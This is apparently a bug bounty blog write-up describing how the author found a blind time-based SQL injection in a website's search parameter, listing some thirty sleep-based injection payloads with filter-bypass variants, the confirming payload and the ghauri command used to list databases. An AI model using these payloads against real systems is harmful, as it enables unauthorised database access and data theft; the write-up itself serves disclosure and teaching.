Behind the Scenes of a $2500 Reward: Exploring SQL Injection on a Search Page

In the vast landscape of cyberspace, where lines of code construct virtual realms and digital doors protect valuable information, an intriguing challenge presented itself before me. Little did I know that this seemingly ordinary search page would become the gateway to a thrilling adventure — one that would not only test my technical prowess but also reward my dedication with an unexpected bounty of $2500.

Just like a detective drawn to a puzzling case, I embarked on a journey that led me to uncover the hidden threat of SQL injection. In this blog post, I invite you to join me in reliving the moments of my discovery, a tale that showcases the power of curiosity, ethical hacking, and the profound impact it can have on the digital world. As the story unfolds, you'll witness how a few lines of malicious code turned into a triumph of cybersecurity, underlining the importance of vigilance in an age where information is both our asset and our vulnerability.

The Journey of Discovery: Unraveling SQL Injection

In the vast expanse of the digital landscape, where websites serve as gateways to boundless information, lies a hidden realm of vulnerabilities — a realm I stumbled upon during a seemingly ordinary web exploration. Little did I know that this journey would lead me to unveil a hidden threat known as SQL injection, a discovery that would later earn me a reward of $2500.

My journey began when I encountered a specific search query parameter, "search=", on a website. With a spark of curiosity, I realized that this parameter could potentially be a gateway to something more intriguing — something that lay beneath the surface. Eager to explore, I started with the basics, attempting common SQL injection payloads, but to no avail.

Initial Testing Phase

0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(),sleep(5),0)
'XOR(if(now()=sysdate(),sleep(5),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
0'or(now()=sysdate()&&SLEEP(1))or'Z
if(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/
if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/
if(1=1,sleep(5),0)/*'XOR(if(1=1,sleep(5),0))OR'"XOR(if(1=1,sleep(5),0))OR"*/
if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(5),0))OR"*/
SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/
%2c(select%5*%5from%5(select(sleep(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
'%2b(select*from(select(sleep(5)))a)%2b'
(select*from(select(sleep(5)))a)
1'%2b(select*from(select(sleep(5)))a)%2b'
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--
'+(select*from(select(sleep(5)))a)+'
(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"
(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f
(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/
',''),/*test*/%26%26%09sLeEp(5)%09--+

As I encountered roadblocks, my determination only grew stronger. I recalled tales of "blind" SQL injection — a more elusive technique that required patience and precision. Armed with this knowledge, I delved deeper into the art of crafting payloads that could reveal the database's inner workings. Hours turned into days as I experimented, each attempt guiding me closer to understanding the system's vulnerabilities.

Then, it happened — an ingenious payload, like a key turning in a lock, granted me access to the system. The thrill of discovery surged through me as I realized I had successfully confirmed the presence of a SQL injection vulnerability. To document this pivotal moment, I captured snapshots of the request and response times, creating a digital record of my triumph.

'and(select*from(select+sleep(10))a/**/union/**/select+1)='

Exploitation and Discovery

Wanting to delve even deeper, I sought tools that could aid in exploiting this newfound vulnerability. Initially, I turned to the well-regarded SQL injection testing tool, SQLMap. Armed with the captured request, I set SQLMap on its course. However, for reasons unknown, SQLMap encountered hurdles and was unable to fully exploit the vulnerability.

Determined not to be deterred, I explored alternative avenues. Enter "ghauri," a tool designed to wield the power of SQL injection for ethical hackers. Armed with the captured request file, I crafted a command: "ghauri -r request.txt -- dbs." With a sense of anticipation, I executed the command, and lo and behold, the names of the databases residing within the system unveiled themselves.

Like a modern-day explorer, I embarked on a journey through the databases, navigating uncharted territories within the digital landscape. I methodically enumerated tables and columns, revealing the intricate architecture that held valuable data.

ghauri -r request.txt --dbs

Visual representation of SQL Injection attack flow

As my understanding deepened, I recognized the gravity of the impact a successful SQL injection attack could have had — sensitive data exposed, user trust eroded. The importance of responsible disclosure weighed heavily on me.

Guided by ethics, I compiled my findings and prepared to share them with the organization responsible for the vulnerable website. It was a pivotal moment — an opportunity to both protect user data and contribute to a safer online ecosystem.

The organization's response was not only appreciative but also generous. They recognized the significance of my discovery and rewarded my efforts with a $2500 bounty — a gesture that affirmed the value of ethical hacking and the impact it can have.

Through this journey, I learned that in the interconnected world of technology, curiosity and persistence can lead to profound discoveries. My experience underscores the vital role ethical hackers play in safeguarding the digital realm, one vulnerability at a time. Armed with knowledge, tools, and a sense of responsibility, we can collectively fortify our online environments and ensure a safer digital future.

Steps to Reproduce

1. Capturing the Target

   The journey began with a search query — a seemingly innocuous parameter, "search=" on the target website. With the understanding that this parameter could potentially harbor vulnerabilities, I embarked on the first step: capturing the HTTP request.

   By intercepting the request using tools like Burp Suite or browser developer tools, I secured a snapshot of the communication between my browser and the website's server. This snapshot was the key that unlocked the door to potential vulnerabilities.

2. Crafting the Payload

   With the request in hand, I ventured into the world of payloads. Blind SQL injection demands precision — each payload meticulously designed to provoke discernible responses from the server.

   Based on my knowledge and experience, I crafted a blind SQL injection payload — a string of characters that, when injected into the parameter, would prompt the server to reveal subtle cues in its responses.

3. Confirming the Vulnerability

   The heart of the process lay in the responses — the way the server reacted to my payloads. As I injected different variations of the payload, I watched for changes in the site's behavior. These changes were the breadcrumbs guiding me toward confirmation.

   Acknowledgment of the payload's impact signaled the presence of a vulnerability. In this case, a successful payload would indicate that the server was processing the SQL injection, setting the stage for deeper exploration.

4. Documenting the Triumph

   With vulnerability confirmed, I documented the journey. I saved the request, complete with the successful payload, into a file. This record would serve as a reference point — a tangible piece of evidence that encapsulated the moment of discovery.

5. Leveraging Ghauri

   But the journey didn't stop at vulnerability confirmation; it evolved into exploitation. While tried-and-true tools like SQLMap faltered in this case, the innovative spirit of ethical hacking led me to Ghauri — a tool that promised a fresh approach.

   With the captured request file in hand, I invoked Ghauri's power through a command: "ghauri -r request.txt -- dbs." The command, like a key turning in a lock, opened the doors to the database realm.

6. Unveiling the Databases

   The databases unfurled before me, each with its own secrets and stories. This moment was akin to lifting the veil on a trove of information — names that hinted at the breadth of data residing within.

   As I navigated the databases, I recognized that this was only the beginning — an entry point to a labyrinth of data, tables, and columns that held the potential to transform understanding into insight.

7. Reporting and Recognition

   In this journey, discovery wasn't the final destination; responsibility followed closely. Armed with knowledge, I compiled my findings into a comprehensive report. I reached out to the organization behind the website, prepared to share both the vulnerability and the steps to remedy it.

   Their response was not only appreciative but also rewarding. A bounty of $2500 served as recognition for my commitment to ethical hacking, the responsible disclosure of vulnerabilities, and the potential impact of my actions.

Conclusion

As ethical hackers, we're the guardians of the digital realm, charting a path of vigilance and knowledge. From crafting payloads to leveraging tools, our actions shape the online landscape, fortifying it against threats.

Let this journey remind us that with each discovery, we contribute to a safer digital future — one vulnerability at a time. Together, we ensure that technology remains a force for progress, innovation, and trust.

As the digital horizon expands, let our commitment to ethical hacking remain unwavering. For in our pursuit lies the promise of a more secure, resilient, and interconnected world.

Step forward, for the journey continues — where lines of code become opportunities, vulnerabilities become lessons, and the path to a safer digital world is illuminated by our collective dedication.